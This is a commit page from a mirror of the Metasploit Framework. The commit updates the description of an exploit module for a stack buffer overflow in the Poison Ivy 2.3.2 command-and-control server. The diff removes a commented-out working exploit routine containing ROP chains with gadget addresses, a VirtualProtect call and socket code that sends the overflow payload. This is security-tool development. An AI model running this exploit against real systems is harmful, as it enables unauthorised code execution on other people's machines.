infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

poisonivy_bof description updated

unstable
jvazquez-r7 2012-07-05 00:18:13 +02:00
parent 8bdf3b56f5
commit ff4a0bc3aa
1 changed files with 12 additions and 77 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

89
modules/exploits/windows/misc/poisonivy_bof.rb
View File

@ -18,22 +18,25 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => "Poison Ivy 2.3.2 C&C Server Buffer Overflow", 'Name' => "Poison Ivy 2.3.2 C&C Server Buffer Overflow",
'Description' => %q{ 'Description' => %q{
This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server. This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server.
The exploit does not need to know the password chosen for the bot/server comm. The exploit does not need to know the password chosen for the bot/server
If the C&C is configured with the default 'admin' password the exploit should communication. If the C&C is configured with the default 'admin' password,
work fine. In case of the C&C configured with another password the exploit can the exploit should work fine. In case of the C&C configured with another
fail. password the exploit can fail. The 'check' command can be used to determine
if the C&C target is using the default 'admin' password.
Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread
responsible of handling the connection. Because of this the module provides a responsible of handling the connection. Because of this the module provides the
Bruteforce target. When selected a random header will be sent in case the default RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header
for the password 'admin' doesn't work. Bruteforce will stop after 5 tries or a will be used. If the bruteforce target is selected, a random header will be sent in
session obtained. case the default for the password 'admin' doesn't work. Bruteforce will stop after
5 tries or a session obtained.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'Andrzej Dereszowski', # Vulnerability Discovery 'Andrzej Dereszowski', # Vulnerability Discovery
'Gal Badishi' # Exploit and Metasploit module 'Gal Badishi', # Exploit and Metasploit module
'juan vazquez' # Testing and little of Metasploit-fu
], ],
'References' => 'References' =>
[ [
@ -176,72 +179,4 @@ end
(1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process) (1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process)
(2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter (2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter
def exploit
# This is the 32-byte header we want to send, encrypted with the default password ("admin")
# We have a very good chance of succeeding even if the password was changed
header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
short_rop = [
0x0041F1E9, # 1st jump - will put esp (8 bytes from here) into ecx: push esp # and al,4 # pop ecx # pop edx # retn
0x00401000, # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
0xFFFF8000, # edx. We'll add this number later to ebp (which will subtract 0x8000 from it).
0x0042F63A, # Will put esp into ebp: push esp # pop ebp # pop edi # pop esi # pop ebx # retn
0x00000000, # edi (ebp points here now)
0x00000000, # esi
0x00000000, # ebx
0x00426799, # We need this to offset ebp: mov eax,edx # retn
0x0041F337, # Subtract 0x8000 from ebp: add ebp,eax # retn
0x00403A77, # mov esp,ebp # pop ebp # retn
].pack("V*")
long_rop = [
0x00000000, # New ebp
0x0041F1E9, # Will put esp (8 bytes from here) into ecx: push esp # and al,4 # pop ecx # pop edx # retn
0x0000002C, # edx. We'll add this number later to ebp, to prevent looping.
0x0042F63A, # Will put esp into ebp: push esp # pop ebp # pop edi # pop esi # pop ebx # retn
0x00000001, # edi. We need it when we call VirtualProtect (ebp points here now)
0x00000000, # esi
0x00000000, # ebx
0x00426799, # We need this to offset ebp: mov eax,edx # retn
0x0041F337, # Subtract 0x8000 from ebp: add ebp,eax # retn
0x004D82DE, # eax will now point 8 bytes from the beginning of the bigger ROP chain: mov eax,ecx # retn
0x004F196E, # push eax (address) and call VirtualProtect, then add ebx, 0x28 # mov edi, 0x46FAC1 # pop esi # pop ebx # mov esp, ebp # pop ebp # ret 8
0x00004000, # Size
0x00000040, # New protect (0x40 = PAGE_EXECUTE_READWRITE)
0x00401000, # Old protect (ptr)
0x00000000, # esi
0x00000000, # ebx. ebp will point here after the offset, meaning that esp will point here after VirtualProtect.
0x0041AA97, # jmp esp (also new ebp)
0x00000000, # Discarded
0x00000000, # Discarded
].pack("V*")
short_rop_pos = 0x806D
long_rop_pos = short_rop_pos - 0x7FF0
# Handshake
connect
print_status("Performing handshake...")
sock.put("\x00" * 256)
sock.get
# Don't change the nulls, or it might not work
xploit = ''
xploit << header
xploit << "\x00" * (long_rop_pos - xploit.length)
xploit << long_rop
xploit << payload.encoded
xploit << "\x00" * (short_rop_pos - xploit.length)
xploit << short_rop
# The disconnection triggers the exploit
print_status("Sending exploit...")
sock.put(xploit)
select(nil,nil,nil,5)
disconnect
# Time to own the box
handler
end
=end =end